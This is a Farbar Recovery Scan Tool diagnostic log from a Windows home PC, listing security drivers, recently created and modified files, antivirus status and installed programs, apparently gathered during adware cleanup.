R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [458336 2014-11-25] (Kaspersky Lab ZAO)
S4 klflt; C:\Windows\System32\DRIVERS\klflt.sys [115296 2014-11-25] (Kaspersky Lab ZAO)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [625248 2014-11-25] (Kaspersky Lab ZAO)
R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [29792 2013-10-08] (Kaspersky Lab ZAO)
R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [29280 2014-11-25] (Kaspersky Lab ZAO)
R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2013-10-08] (Kaspersky Lab ZAO)
R1 klpd; C:\Windows\System32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO)
R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [55904 2013-05-14] (Kaspersky Lab ZAO)
R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [178272 2014-11-25] (Kaspersky Lab ZAO)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [35064 2015-01-20] ()
S1 BHDrvx64; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\BASHDefs\20120711.002\BHDrvx64.sys [X]
S3 NAVENG; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\ENG64.SYS [X]
S3 NAVEX15; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\EX64.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-23 18:12 - 2015-01-23 18:12 - 00021600 _____ () C:\Users\Admin\Desktop\FRST.txt
2015-01-22 20:55 - 2015-01-22 20:56 - 00000000 ____D () C:\Users\Admin\Desktop\NPP
2015-01-22 20:48 - 2015-01-22 20:48 - 00379899 _____ () C:\Users\Admin\Desktop\notepad2_4.2.25_x64.zip
2015-01-22 20:20 - 2015-01-22 20:20 - 00000297 _____ () C:\files.log
2015-01-22 20:20 - 2015-01-22 19:58 - 00024064 _____ () C:\Windows\zoek-delete.exe
2015-01-22 20:12 - 2015-01-22 20:20 - 00000079 _____ () C:\folders.log
2015-01-22 20:12 - 2015-01-22 20:20 - 00000000 ____D () C:\zoek
2015-01-22 19:59 - 2015-01-22 20:20 - 00051361 _____ () C:\zoek-results.log
2015-01-22 19:58 - 2015-01-22 20:17 - 00000000 ____D () C:\zoek_backup
2015-01-22 19:09 - 2015-01-22 19:09 - 00000000 ____D () C:\Windows\ERUNT
2015-01-21 23:59 - 2015-01-23 18:10 - 00000000 ____D () C:\Users\Admin\Desktop\SpywareHammerArchivedTools
2015-01-21 23:27 - 2015-01-21 23:31 - 00000000 ____D () C:\AdwCleaner
2015-01-21 22:29 - 2015-01-21 22:29 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Mozilla
2015-01-21 22:29 - 2015-01-21 22:29 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\ATI
2015-01-21 22:29 - 2015-01-21 22:29 - 00000000 ____D () C:\Users\Admin\AppData\Local\Mozilla
2015-01-21 22:29 - 2015-01-21 22:29 - 00000000 ____D () C:\Users\Admin\AppData\Local\ATI
2015-01-21 22:28 - 2015-01-21 22:28 - 00438944 _____ () C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2015-01-21 22:28 - 2015-01-21 22:28 - 00001420 _____ () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-01-21 22:28 - 2015-01-21 22:28 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\OEM
2015-01-21 22:28 - 2015-01-21 22:28 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\ControlCenter4
2015-01-21 22:28 - 2015-01-21 22:28 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Apple Computer
2015-01-21 22:14 - 2015-01-21 22:14 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirusTotal Uploader 2.2
2015-01-21 22:14 - 2015-01-21 22:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VirusTotal Uploader 2.2
2015-01-21 22:14 - 2015-01-21 22:14 - 00000000 ____D () C:\Program Files (x86)\VirusTotalUploader2
2015-01-20 23:32 - 2015-01-20 23:32 - 00000000 __SHD () C:\Users\Admin\AppData\Local\EmieUserList
2015-01-20 23:32 - 2015-01-20 23:32 - 00000000 __SHD () C:\Users\Admin\AppData\Local\EmieSiteList
2015-01-20 23:32 - 2015-01-20 23:32 - 00000000 __SHD () C:\Users\Admin\AppData\Local\EmieBrowserModeList
2015-01-20 23:32 - 2015-01-20 23:32 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Adobe
2015-01-20 23:30 - 2015-01-20 23:30 - 00035064 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2015-01-20 23:30 - 2015-01-20 23:30 - 00000000 ____D () C:\ProgramData\RogueKiller
2015-01-20 23:21 - 2015-01-23 18:12 - 00000000 ____D () C:\FRST
2015-01-20 22:29 - 2015-01-20 22:29 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-01-20 21:50 - 2015-01-20 21:50 - 02126848 _____ (Farbar) C:\Users\Admin\Desktop\FRST64.exe
2015-01-19 11:14 - 2015-01-19 11:14 - 00000000 ____D () C:\Windows\ERDNT
2015-01-19 11:13 - 2015-01-19 11:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT
2015-01-19 11:13 - 2015-01-19 11:13 - 00000000 ____D () C:\Program Files (x86)\ERUNT
2015-01-16 21:21 - 2015-01-21 22:28 - 00000000 ____D () C:\Users\Admin
2015-01-16 21:21 - 2015-01-16 21:21 - 00000020 ___SH () C:\Users\Admin\ntuser.ini
2015-01-16 21:21 - 2012-06-01 02:04 - 00000000 ____D () C:\Users\Admin\AppData\Local\Microsoft Help
2015-01-16 21:21 - 2012-05-29 04:19 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Macromedia
2015-01-16 21:21 - 2009-07-13 21:54 - 00000000 ___RD () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-01-16 21:21 - 2009-07-13 21:49 - 00000000 ___RD () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-01-14 23:48 - 2015-01-14 23:49 - 517151106 _____ () C:\Users\Bonnie\Documents\registryBackup_1-14-15.reg
2015-01-14 22:38 - 2014-12-18 20:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-14 22:38 - 2014-12-18 18:46 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-14 22:38 - 2014-12-11 22:35 - 05553592 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-14 22:38 - 2014-12-11 22:31 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-01-14 22:38 - 2014-12-11 22:31 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-01-14 22:38 - 2014-12-11 22:31 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-01-14 22:38 - 2014-12-11 22:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-01-14 22:38 - 2014-12-11 22:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-01-14 22:38 - 2014-12-11 22:07 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-01-14 22:38 - 2014-12-11 10:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-14 22:38 - 2014-12-05 21:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-14 22:38 - 2014-12-05 20:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2015-01-14 22:38 - 2014-12-05 20:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll
2015-01-14 22:38 - 2014-08-28 19:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2015-01-14 22:38 - 2014-05-08 02:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2015-01-14 22:37 - 2014-09-04 19:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2015-01-14 22:37 - 2014-09-04 18:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2015-01-13 07:53 - 2013-10-01 19:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2015-01-13 07:53 - 2013-10-01 19:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2015-01-13 07:53 - 2013-10-01 19:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2015-01-13 07:53 - 2013-10-01 18:29 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2015-01-13 07:53 - 2013-10-01 18:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2015-01-13 07:53 - 2013-10-01 16:58 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2015-01-13 07:52 - 2013-10-01 18:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2015-01-13 07:52 - 2013-10-01 18:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2015-01-13 07:52 - 2013-10-01 17:15 - 01057280 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2015-01-13 07:52 - 2013-10-01 17:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
2015-01-13 07:52 - 2013-10-01 17:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2015-01-13 07:52 - 2013-10-01 17:01 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2015-01-13 07:52 - 2013-10-01 16:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2015-01-13 07:52 - 2013-10-01 16:08 - 00855552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2015-01-13 07:52 - 2013-10-01 15:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2015-01-13 07:51 - 2012-08-23 07:13 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2015-01-13 07:51 - 2012-08-23 07:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2015-01-13 07:51 - 2012-08-23 07:08 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbGD.sys
2015-01-13 07:51 - 2012-08-23 04:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2015-01-13 07:51 - 2012-08-23 03:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2015-01-13 07:49 - 2015-01-14 23:24 - 00000139 _____ () C:\Users\Bonnie\Desktop\SECURITY QUESTIONs.txt
2015-01-12 21:15 - 2015-01-12 21:15 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2015-01-07 09:57 - 2015-01-07 09:57 - 00000000 ____D () C:\ProgramData\pnikjcemimhgahpjiapnjbejoigfkjcj
2015-01-06 19:51 - 2015-01-06 19:51 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\67F23A27.sys
2015-01-06 19:50 - 2015-01-06 19:50 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\12D43959.sys
2015-01-04 10:45 - 2015-01-04 10:45 - 00003886 _____ () C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-01-04 10:37 - 2015-01-04 10:38 - 00316504 _____ () C:\Windows\Minidump\010415-35771-01.dmp

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-23 18:10 - 2011-10-06 17:55 - 01064442 _____ () C:\Windows\WindowsUpdate.log
2015-01-23 18:09 - 2014-01-01 14:45 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2015-01-23 18:09 - 2012-12-02 20:12 - 00000000 ___RD () C:\Users\Bonnie\Dropbox
2015-01-23 18:09 - 2012-12-02 20:09 - 00000000 ____D () C:\Users\Bonnie\AppData\Roaming\Dropbox
2015-01-23 18:05 - 2014-11-24 15:22 - 00000000 ____D () C:\ProgramData\Kaspersky Lab
2015-01-23 18:04 - 2009-07-13 21:51 - 00073038 _____ () C:\Windows\setupact.log
2015-01-22 20:29 - 2009-07-13 21:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-22 20:29 - 2009-07-13 21:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-22 20:21 - 2010-11-20 20:47 - 01384912 _____ () C:\Windows\PFRO.log
2015-01-22 20:13 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2015-01-22 19:00 - 2014-10-09 19:57 - 00251904 ___SH () C:\Users\Bonnie\Desktop\Thumbs.db
2015-01-21 23:23 - 2014-07-01 10:06 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-21 22:41 - 2012-05-29 04:19 - 00000000 ____D () C:\Users\Bonnie
2015-01-21 21:54 - 2013-01-02 16:58 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2015-01-20 21:38 - 2009-07-13 22:13 - 00795858 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-16 21:21 - 2012-06-03 08:21 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\Google
2015-01-16 20:59 - 2014-06-11 15:26 - 00000000 ____D () C:\Users\Bonnie\AppData\Roaming\Spotify
2015-01-15 00:05 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-15 00:02 - 2012-06-13 10:34 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-14 23:56 - 2012-06-13 10:34 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-01-14 23:56 - 2012-06-13 10:34 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-01-14 23:56 - 2011-07-20 22:08 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-01-14 23:02 - 2012-05-29 06:07 - 00787980 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2015-01-14 22:55 - 2013-07-14 02:01 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-14 22:34 - 2014-06-11 15:31 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\Spotify
2015-01-13 08:00 - 2009-07-13 20:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-01-13 07:57 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2015-01-13 07:41 - 2014-01-01 15:06 - 00001945 _____ () C:\Windows\epplauncher.mif
2015-01-13 07:39 - 2014-01-26 20:42 - 00000000 ____D () C:\Users\Bonnie\Desktop\Mom RS
2015-01-13 07:39 - 2012-11-26 10:35 - 00000000 ____D () C:\Users\Bonnie\Desktop\Christmas 12
2015-01-13 07:39 - 2012-11-18 12:57 - 00000000 ____D () C:\Users\Bonnie\Desktop\For Jen
2015-01-13 07:39 - 2012-09-09 10:42 - 00000000 ____D () C:\Users\Bonnie\Desktop\August 2012 Ensign
2015-01-10 22:53 - 2012-06-22 16:18 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\CrashDumps
2015-01-08 09:55 - 2010-11-20 20:27 - 00298120 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2015-01-06 19:51 - 2014-07-01 10:06 - 00001109 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-01-06 19:51 - 2014-07-01 10:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-01-06 19:51 - 2014-07-01 10:05 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-01-04 10:37 - 2014-03-18 14:50 - 497851607 _____ () C:\Windows\MEMORY.DMP
2015-01-04 10:37 - 2014-03-18 14:50 - 00000000 ____D () C:\Windows\Minidump
2014-12-31 13:12 - 2012-12-15 11:51 - 113365784 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-12-28 09:58 - 2009-07-13 22:32 - 00000000 ____D () C:\Windows\system32\FxsTmp

==================== Files in the root of some directories =======
2013-03-14 06:09 - 2014-04-07 19:32 - 0000775 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Some content of TEMP:
====================
C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpr4zdmj.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-01-09 14:52

==================== End Of Log ============================

Addition:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-01-2015
Ran by Admin at 2015-01-23 18:12:43
Running from C:\Users\Admin\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Kaspersky Internet Security (Enabled - Up to date) {179979E8-273D-D14E-0543-2861940E4886}
AS: Kaspersky Internet Security (Enabled - Up to date) {ACF8980C-0107-DEC0-3FF3-1313EF89023B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky Internet Security (Enabled) {2FA2F8CD-6D52-D016-2E1C-81546ADD0FFD}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.7.0.19480 - Adobe Systems Incorporated)
Adobe Flash Player 16 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 16.0.0.257 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.257 - Adobe Systems Incorporated)
Adobe Reader X (10.1.13) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.13 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI AVIVO64 Codecs (Version: 10.12.0.00210 - ATI Technologies Inc.) Hidden
ATI Catalyst Install Manager (HKLM\...\{CADBC192-932B-EC76-510D-4012A33C5E20}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Brother MFL-Pro Suite DCP-7065DN (HKLM-x32\...\{3ACCCFB3-7B17-4E9F-ACB0-46868FCD4487}) (Version: 1.1.3.0 - Brother Industries, Ltd.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.97 - WildTangent) Hidden
CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.0.1 - Canon Inc.)
CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.8.0.1 - Canon Inc.)
Canon Internet Library for ZoomBrowser EX (HKLM-x32\...\Canon Internet Library for ZoomBrowser EX) (Version: 1.7.0.1 - Canon Inc.)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.6.0.5 - Canon Inc.)
Canon Utilities ImageBrowser EX (HKLM-x32\...\ImageBrowser EX) (Version: 1.5.0.6 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.6.0.23 - Canon Inc.)
ccc-core-static (x32 Version: 2010.0210.2206.39615 - ATI) Hidden
Chronicles of Albian (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
CyberLink MediaEspresso (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.1720_38230 - CyberLink Corp.)
CyberLink PowerDVD 10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.2531.52 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dropbox (HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Dropbox) (Version: 3.0.3 - Dropbox, Inc.)
eBay Worldwide (HKLM-x32\...\{D3E5A972-9A15-427D-AE78-8181A5FD943C}) (Version: 2.2.0409 - OEM)
ERUNT 1.1j (HKLM-x32\...\ERUNT_is1) (Version:  - Lars Hederer)
FamilySearch Indexing 3.13.1 (HKLM-x32\...\0591-8077-9297-0833) (Version: 3.13.1 - FamilySearch)
Final Drive: Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Gateway Games (HKLM-x32\...\WildTangent gateway Master Uninstall) (Version: 1.0.2.5 - WildTangent)
Gateway Recovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 5.00.3502 - Gateway Incorporated)
Gateway Registration (HKLM-x32\...\Gateway Registration) (Version: 1.04.3503 - Gateway Incorporated)
Gateway ScreenSaver (HKLM-x32\...\Gateway Screensaver) (Version: 1.1.0225.2011 - Gateway Incorporated)
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hotkey Utility (HKLM-x32\...\Hotkey Utility) (Version: 2.05.3505 - Gateway Incorporated)
HP LaserJet 1020 Series (HKLM\...\HP LaserJet 1020 Series) (Version:  - )
HP Support Solutions Framework (HKLM-x32\...\{23CCE784-A812-4647-AEFF-1DCCD4E57478}) (Version: 11.50.0000 - Hewlett-Packard Company)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3501 - Gateway Incorporated)
iTunes (HKLM\...\{D601CEAD-2E4F-4BBB-85CC-C29A4CE6A3C0}) (Version: 11.1.3.8 - Apple Inc.)
Jewel Match 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kaspersky Internet Security (HKLM-x32\...\InstallWIX_{6F6873E3-5C92-4049-B511-231A138DD090}) (Version: 14.0.0.4651 - Kaspersky Lab)
Kaspersky Internet Security (x32 Version: 14.0.0.4651 - Kaspersky Lab) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Web Publishing Wizard 1.52 (HKLM-x32\...\WebPost) (Version:  - )
Mozilla Firefox 35.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0 (x86 en-US)) (Version: 35.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
